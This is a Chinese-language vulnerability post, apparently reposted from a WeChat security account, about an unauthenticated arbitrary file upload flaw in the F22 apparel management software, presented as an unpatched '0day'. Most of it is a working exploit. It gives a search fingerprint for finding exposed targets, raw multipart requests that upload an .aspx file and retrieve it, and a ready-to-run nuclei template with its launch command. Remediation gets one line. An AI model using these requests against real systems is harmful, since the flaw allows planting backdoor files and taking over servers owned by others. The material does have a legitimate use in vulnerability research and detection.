免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
02
—
漏洞影响
F22服装管理软件系统
03
—
漏洞描述
广州锦铭泰软件科技有限公司开发的F22服装管理软件系统
/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
04
—
body="F22WEB登陆"
05
—
漏洞复现
向靶场发送如下数据包上传文件
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"
/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"
Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--
响应内容如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 23
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Wed, 29 Nov 2023 12:11:04 GMT
Server: Microsoft-IIS/7.5
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
1,2023112820110493.aspx
第二步:访问回显文件
GET /upload/udplog/2023112820110493.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
响应数据包如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 27
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 29 Nov 2023 12:11:08 GMT
Server: Microsoft-IIS/7.5
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
hello1234567
证明存在漏洞
06
—
nuclei poc
poc文件完整内容如下
id: F22-UploadHandler-fileupload
info:
name: F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
author: fgz
severity: critical
description: 'F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。'
tags: 2023, F22, fileupload
metadata:
1 :
body="F22WEB登陆" :
verified: true
http:
raw:
|
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: {{Hostname}}
zh-CN,zh;q=0.9 :
multipart/form-data; boundary=----------{{randstr}} :
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 :
Accept: */*
gzip, deflate :
------------{{randstr}}
form-data; name="folder" :
/upload/udplog
------------{{randstr}}
form-data; name="Filedata"; filename="1.aspx" :
application/octet-stream :
{{randstr}}
------------{{randstr}}
form-data; name="Upload" :
Submit Query
------------{{randstr}}--
|
GET /upload/udplog/{{replace(file_name,'1,','')}} HTTP/1.1
Host: {{Hostname}}
extractors:
type: dsl
internal: true
name: file_name
dsl:
body
matchers:
type: dsl
dsl:
"status_code_1 == 200 && contains(body_1, 'aspx') && status_code_2 == 200 && contains(body_2, '{{randstr}}')"
运行POC
nuclei.exe -t mypoc/其他/F22-UploadHandler-fileupload.yaml -u http://x.x.x.x
07
—
修复建议
关注厂商补丁,或者部署WAF进行防护。
原文始发于微信公众号(AI与网安):【0day】F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞(附POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论